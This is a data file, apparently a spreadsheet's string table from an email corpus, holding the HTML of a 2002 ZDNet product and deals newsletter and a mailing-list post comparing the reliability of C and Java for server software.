 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5rqvUtmhmbiqzUbrvLkiDeR" &gt;$20 off SideWinder Strategic Commander&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-2"&gt;Expires September 30, 2002&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFr4T839glEn9kgGa2oXqGyR" &gt;$20 off Rio 600 64MB&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMsVa7K7VPyLxjkqVAXXblR" &gt;$20 off Nike PSA (120)&lt;/a&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=46-19zwInpD4HbC89Xa1cN0535V0Y9R" &gt;$20 off RioVolt SP90&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;&lt;font face="arial, helvetica" size="-2"&gt;Expires March 3, 2003&lt;br&gt;
 &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKDBhl1Y1bxCjjvDSwizzcR" &gt;$10 off Microsoft Natural Keyboard Pro PS2/USB&lt;/a&gt;&lt;br&gt;
 &lt;br&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;!-- top 5 --&gt;&lt;IMG 
       height=18 alt="ZDNet Top 5 Products" src="http://www.cnet.com/i/sh/nl/top5.gif" 
       width=160&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=2 cellPadding=0 width=160 bgColor=#eeeeee border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD colSpan=4&gt;&lt;!--&lt;IMG height=3 src="http://www.cnet.com/i/sh/nl/b.gif" 
             width=1&gt;&lt;BR&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&amp;nbsp; &lt;IMG alt="" 
             src="e50520011112_files/rhc_digitalcameras.gif" border=0&gt;--&gt; &lt;b&gt;&lt;FONT face="arial, helvetica" size=-1&gt;Handhelds&lt;/font&gt;&lt;/b&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD rowSpan=5&gt;&amp;nbsp;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=15&gt;&lt;FONT face="arial, helvetica" 
           size=-1&gt;&lt;B&gt;1.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
  &lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdp6DbnuOEmKns2asfI8UkRR" &gt;&lt;B&gt;Toshiba Pocket PC e310&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 size=-2&gt;Premier merchant:&lt;BR&gt;
 		&lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJoJ4ksBdkSjaeTldfVpf4R" &gt;CDW $399&lt;/A&gt;&lt;BR&gt;--&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD rowSpan=5&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;2.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIo_AUUILs0dAVJ9PZAKTrR" &gt;&lt;B&gt;Palm m515&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 size=-2&gt;Premier 
             merchant:&lt;BR&gt;&lt;a href="http://clickthru.online.com/Click?q=b0-NZmfQQJrcJ9-e_adxQMKtNX8PQiR" &gt;buy.com $445&lt;/A&gt;&lt;BR&gt;--&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;3.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzOaAxcMAYQzSROUJEymxqPR" &gt;&lt;B&gt;Handspring Treo 90&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 size=-2&gt;Premier merchant:&lt;BR&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUPq24o999EbjsMVKpv3DxnR" &gt;buy.com $649&lt;/A&gt;&lt;BR&gt;--&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;4.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkH9ZV11NbqBxDVAmoBameR" &gt;&lt;B&gt;Toshiba Pocket PC e740&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 
             size=-2&gt;Premier merchant:&lt;BR&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXAfWBZd798BbBL7kOi_yR" &gt;CDW $499&lt;/A&gt;&lt;BR&gt;--&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;5.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rXweSzdmiKMZ2Fz8IR7XlR" &gt;&lt;B&gt;Compaq iPaq H3835&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;&lt;!--&lt;FONT color=#333333 
             size=-2&gt;Premier merchant:&lt;BR&gt;&lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiK89M37PpTktQ3DlPfP8N4R" &gt;Dell $1,467&lt;/A&gt; &lt;BR&gt;--&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAW87wllp9Z5VKc-3P0BcR" &gt;More Top 
             Selling Products...&lt;/A&gt;&lt;/B&gt;&lt;/B&gt;&lt;BR&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
     &lt;TD vAlign=bottom width=12 colSpan=3&gt;&lt;IMG height=6 
       src="http://www.cnet.com/i/sh/nl/gl_corner2.gif" width=12&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;!-- intro --&gt;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width=428 bgColor=#ffffff&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=428 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR vAlign=top&gt;
           &lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=10&gt;&lt;/TD&gt;
           &lt;TD width=410&gt;&lt;BR&gt;
             &lt;TABLE cellSpacing=0 cellPadding=0 width=410 border=0&gt;
               &lt;TBODY&gt;
               &lt;TR vAlign=top&gt;
                 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;FONT color=#333333 
                   size=2&gt;&lt;B&gt;Dear Reader,&lt;BR&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;
 Personal lasers come in shapes, sizes, and prices to suit almost 
 any user. A low-end desktop laser printer can cost as little as 
 $199 or as much as $500, but most hover around $300 and strike a 
 good balance between speed, quality, and features. The less expensive 
 models will suit students or home users who need to print letters 
 or homework assignments, as well as perform other simple tasks. 
 In pricier models, vendors typically add more RAM, higher-capacity 
 paper trays, duplexing capabilities, and networking options for 
 corporate and small-business users. 
 &lt;p&gt;
 Check out a few of our favorites below and find the laser printer
 with the right price and features for you!
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=59-y53oIEntHtnwsNSlpW-B_KMqztFR" &gt;Brother HL-1440&lt;/a&gt; 
 &lt;li&gt;Lowest price: $249
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES_DZdeGRQA5K-fxuEL59R" &gt;HP LaserJet 1200&lt;/a&gt; 
 &lt;li&gt;Lowest price: $319
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ71Z1RjzUtuoAABMMPZ9rR" &gt;Lexmark E320&lt;/a&gt; 
 &lt;li&gt;Lowest price: $230
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_za68Vn7dcCW5CH7esbKRiR" &gt;Samsung ML-1450&lt;/a&gt; 
 &lt;li&gt;Lowest price: $231
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEBSIlz-NZQhaIHsSzky0PR" &gt;Xerox Phaser 3400&lt;/a&gt; 
 &lt;li&gt;Lowest price: $627
 &lt;br&gt;&lt;br&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
           &lt;TD width=8&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
         width=8&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- new products--&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=420 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD colSpan=3&gt;&lt;IMG height=30 alt="Feature: New Products" 
             src="http://www.cnet.com/i/sh/nl/sub_new.gif" width=395&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=100&gt;&lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEkRUtBmysgVnxXFZcIuInR" &gt;&lt;IMG height=100 src="http://www.zdnet.com/products/graphics/pid/561185.jpg" width=130 border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=300&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkDUxdk7iRmBekeVktk2eR" &gt;&lt;B&gt;Minolta Dimage F100&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;Friendly to digital novices and enthusiasts alike, the Minolta
 Dimage F100 combines innovative automatic technology and advanced
 manual controls in a very portable package.&lt;BR&gt;&lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVqRkWsZ6lxv3orMjEsaQPR" &gt;&lt;FONT 
             color=#990000 size=-2&gt;Read Review&lt;/FONT&gt;&lt;/A&gt; &lt;FONT color=#990000 
             size=-2&gt;|&lt;/FONT&gt; &lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8ckIVl81_XGuwrfzJ6nnR" &gt;&lt;FONT color=#990000 size=-2&gt;Check Prices&lt;/FONT&gt;&lt;/A&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=4&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=100&gt;&lt;a href="http://clickthru.online.com/Click?q=17-agitI5XroDcz4bFIz4s1RhjGRseR" &gt;&lt;IMG height=100 hspace=10 src="http://www.zdnet.com/products/graphics/pid/560624.jpg" width=130 
             border=0&gt;&lt;/A&gt;&lt;/TD&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=300&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		  &lt;a href="http://clickthru.online.com/Click?q=2c-DatOIc0DRhIa2b2c-r7MBvWpjuyR" &gt;&lt;B&gt;NEC-Mitsubishi MultiSync LCD1550V flat panel&lt;/B&gt;&lt;/A&gt;&lt;BR&gt;This thin monitor is one of the best values in its price class; it's sleek, compact, and stylish, with very good performance.&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKIeK3-LmUU5CfCkxHB0FFR" &gt;&lt;FONT 
             color=#990000 size=-2&gt;Read Review&lt;/FONT&gt;&lt;/A&gt; &lt;FONT color=#990000 
             size=-2&gt;|&lt;/FONT&gt; &lt;a href="http://clickthru.online.com/Click?q=56-NwKYInnsvkWaBuOrctPQDwwaMC9R" &gt;&lt;FONT color=#990000 size=-2&gt;Check Prices&lt;/FONT&gt;&lt;/A&gt; 
       &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- ad --&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=395 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=10&gt;&lt;/TD&gt;
           &lt;TD width=385 bgColor=#c0c0c0&gt;&lt;IMG height=1 
             src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;FONT 
       face="arial, helvetica" size=-1&gt;&lt;BR&gt;&lt;/FONT&gt;
       &lt;CENTER&gt;&lt;IMG height=10 alt=Advertisement 
       src="http://www.cnet.com/i/sh/nl/ad10-dk.gif" width=120&gt;&lt;/CENTER&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3&gt;&lt;IMG height=5 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD colSpan=3&gt;&lt;IMG height=5 src="http://www.cnet.com/i/sh/nl/b.gif" 
           width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR vAlign=center&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD align=right width=75&gt;&lt;IMG alt="" hspace=15 
             src="http://www.cnet.com/i/sh/nl/8474systems.gif" align=middle 
           order="0"&gt;&lt;br&gt;&lt;br&gt;&lt;/TD&gt;
 		  &lt;TD vAlign=top width=300&gt;&lt;FONT face="verdana, helvetica" 
             size=-2&gt;&lt;BR&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEcO-n9O5O80ywQ-4d0P6cR" &gt;$50K-a-day Giveaway from Dell Home Systems&amp;#8230;&lt;/A&gt;&lt;br&gt;Buy any new Dell Home System on or before July 31, 2002 and you'll
 be automatically entered to win $50,000. The next lucky winner
 could be you!&lt;br&gt;&lt;/td&gt;
   &lt;!--&lt;TR vAlign=center&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD align=right width=75&gt;&lt;IMG alt="" hspace=15 
             src="http://www.cnet.com/i/sh/nl/8474systems.gif" align=middle 
           order="0"&gt;&lt;br&gt;&lt;br&gt;&lt;/TD&gt;
 		  &lt;TD vAlign=top width=300&gt;&lt;FONT face="verdana, helvetica" 
             size=-2&gt;&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KB8sJaujppqfRO9R6BpKlR" &gt;$50K-a-day Giveaway from Dell Home Systems&amp;#8230;&lt;/A&gt;&lt;br&gt;Buy any new Dell Home System on or before July 31, 2002 and you'll be automatically entered to win $50,000. The next lucky winner could be you!&lt;br&gt;&lt;/td&gt; 		  
 &lt;tr valign=middle&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td width=75 align=right&gt;&lt;img src="http://www.cnet.com/i/sh/nl/hp_inks2.jpg" width="98" height="82" border="0" hspace="20" align="bottom" alt=""&gt;&lt;/td&gt;
 &lt;td width=300 height="50" valign="top"&gt;&lt;font face="verdana, helvetica" size="-2"&gt;&lt;BR&gt;
 Canon inkjet cartridges start at $2.00!&lt;BR&gt;
 Epson inkjet cartridges start at $4.00!&lt;BR&gt;
 HP inkjet cartridges start at $15.00!&lt;BR&gt;
 Toners start at just $17.00!&lt;BR&gt;
 &lt;a href="http://clickthru.online.com/Click?q=96-pjdWQtduI92nk8RjZWSoS2P4Jm4R" &gt;http://www.voltexx.com&lt;/a&gt;
 &lt;/FONT&gt;&lt;/TD&gt;--&gt;&lt;/TR&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- steals and deals --&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width=420 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=10&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD width=410&gt;&lt;IMG height=30 alt="Steals and Deals" 
             src="http://www.cnet.com/i/sh/nl/sub_steals.gif" width=395&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;FONT size=-2&gt;Please note 
             that prices fluctuate and may have changed since the sending of this 
             newsletter. Lowest prices listed are usually after rebates (but 
             please check with the reseller, sometimes the rebate is included in 
             their price). &lt;BR&gt;&lt;/FONT&gt;
             &lt;P&gt;&lt;B&gt;Sony DVP-NS900V&lt;/B&gt;&lt;BR&gt;Price recently dropped 24%&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=ab-ZcQKQYpdintIeCuXydit0M-0OvrR" &gt;
 			Lowest price: $610&lt;/A&gt; 
             &lt;P&gt;&lt;B&gt;Creative Labs Nomad Jukebox 6GB&lt;/B&gt;&lt;BR&gt;Price recently dropped 31%&lt;BR&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=c0-kfs-QWP2dwerXk641H99K8FZuSiR" &gt;
 			Lowest price: $150&lt;/A&gt;&lt;BR&gt;
             &lt;P&gt;&lt;B&gt;Monitor Dell P992 19 inch (17.9 VIS) Gray&lt;/B&gt;&lt;BR&gt;Price recently dropped 12%&lt;br&gt;
 			&lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1G9q6b2NHCu4jNix1DPPR" &gt;
 			Lowest price: $379&lt;font face="Arial"&gt;&lt;/A&gt; &lt;BR&gt;&lt;br&gt;
 			&lt;BR&gt;&lt;BR&gt;&lt;U&gt;&lt;B&gt;SPECIAL FEATURE&lt;/B&gt;&lt;/U&gt;&lt;BR&gt;&lt;br&gt;Did you know that CNET ChannelOnline enables your sales team to 
 view pricing and product availability in real time?
 &lt;P&gt;
 ChannelOnline's Quote &amp; Procure displays up-to-the-minute pricing 
 and availability from multiple distributors - so you can get your
 customers what they need, when they need it.
 &lt;P&gt;
 You'll be able to:
 &lt;li&gt;View data from your select distributors
 &lt;li&gt;Compare negotiated pricing for all your distributors
 &lt;li&gt;Determine which SKUs are available at your suppliers' warehouses
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ea-fjLyQhV4X0baQH1AwQ4lAUw-5WnR" &gt;&lt;B&gt;Tell me more about Quote &amp; Procure&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/FONT&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;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width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- Thin grey line --&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=top&gt;
     &lt;TD width=1 bgColor=#83A3CB rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD width=10 bgColor=#1E5C99 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD width=3 bgColor=#ffffff rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=2&gt;&lt;/TD&gt;
     &lt;TD width=582 bgColor=#ffffff&gt;&lt;IMG height=5 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=1&gt;&lt;/TD&gt;
     &lt;TD width=3 bgColor=#ffffff rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=2&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;
     &lt;TD width=10 bgColor=#1E5C99 rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=10&gt;&lt;/TD&gt;
     &lt;TD width=1 bgColor=#83A3CB rowSpan=2&gt;&lt;IMG height=1 
       src="http://www.cnet.com/i/sh/nl/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 border=0&gt;
   &lt;TBODY&gt;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width=12 bgColor=#ffffff&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=12&gt;&lt;/TD&gt;
     &lt;TD width=564 bgColor=#ffffff&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;BR&gt;
 &lt;!--Elsewhere --&gt;
       &lt;FONT face="arial, helvetica" color=#990000 size=+1&gt;&lt;B&gt;Elsewhere on ZDNet&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;
       &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1 src="http://www.zdnet.com/b.gif" 
             width=1 NOSEND="1"&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&lt;IMG height=4 src="http://www.zdnet.com/b.gif" width=1 
             NOSEND="1"&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4mnlO6wRZxrhBm0WHtheR" &gt;Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-zG3JjyFy8ZvQIzTKtR1yR" &gt;Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAhzzzneOeNyGEI9rCM8vlR" &gt;Find out the top 10 Web services security requirements at Tech Update.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3f-4sAEIqMWSOWOp47Hcoh57BymNzeR" &gt;Builder.com shows you how to bring Java to the masses with Cold Fusion MX.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=54-l6ovIZKA7jaL4p40O9U4lR0vdksR" &gt;Check out thousands of IT job listings in ZDNet's Career Center.&lt;/A&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=12 bgColor=#ffffff&gt;&lt;IMG height=1 src="http://www.cnet.com/i/sh/nl/b.gif" 
       width=12&gt;&lt;/TD&gt;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
 &lt;!-- footer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href="http://clickthru.online.com/Click?q=69-CY-iIoWgaIrV_QlMoAH4OpRzLxFR" &gt;free newsletters&lt;/a&gt; from ZDNet&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width="1" height="5"&gt;&lt;br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;p&gt;
 &lt;a NOTRACK href='http://clickthru.online.com/Click?q=7e-XDMezipN37q7T_C8ixC7stkhZeXfesRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=93-V4PmQSdQ30GS0BjcTYjvQ8Rgn5rR" &gt;Change e-mail format&lt;/a&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=a8-02XZQQZkrZPXLHCDtZs6swzdONiR" &gt;Change e-mail address&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=bd-c0nUQ7py5mGYJMjpAEVgnfqGsJPR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=d2-THo_QULw1D-jAlU3Gl22vbAOyenR" &gt;Advertise&lt;/a&gt;&lt;br&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=e8-DOJMQfk8U_OEeaFrAP_kMFIM55iR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=fd-BXDMQgOr1lnnyl_O_Iti64Q9t8PR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-XYluXcGl-pEvKY-qkCKnR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI2GRsnMcFSkMRUVolYrBeR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIs1GhZN21Y0VXXjhrHNHyR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPxgt2HKBJlh9GpMUHM3FR" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEDqnCVO-cWhKPAKa1CPIuR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=7c-7NCZIZWccNNhZUpfLHDx1984BOsR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=91-EZnpQAzyN_oUSVRMzb-Byo4hJdlR"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e505&amp;ISSUE=2002-07-16" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=a6-9zV4-wUELIfQRC0x5xDN07bNwRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-08-27 at 08:58, Joseph S. Barrera III wrote:
 &gt;
 &gt; C is more reliable than Java??
 Both are reliable.  "Reliability" is more a function of the software
 engineer.  I've written complicated mission-critical server software in
 Java that will run without a hiccup as long as the Unix box it is
 sitting on is running.  Same with C.  For processes that are running
 months at a time, and in my case constantly touching databases and doing
 lots of low-level network stuff, reliability is obtained by making sure
 every conceivable problem (and problems you didn't conceive of) recovers
 to a clean/safe process state so that things keep running i.e. it is a
 design/programming issue.
 That said, we usually prototype serious systems in Java and then
 re-implement them in C if we have time.  Java doesn't scale well as a
 language for server apps, though not for the reasons usually offered. 
 The problem is that for high-end server apps, you really need fairly
 detailed and low-level control of system resources to get around
 bottlenecks that show up relatively quickly in languages that don't give
 you access to it.  You can squeeze several times the performance out of
 a C server program than a Java one simply by being able to finely tune
 (or more frequently, bypass) the system resource management. 
 Nonetheless, this is not a significant factor for most applications you
 could conceivably develop in either language, as most aren't limited by
 raw performance scalability.
 -James Rogers
  jamesr@best.com
</t>
  </si>
  <si>
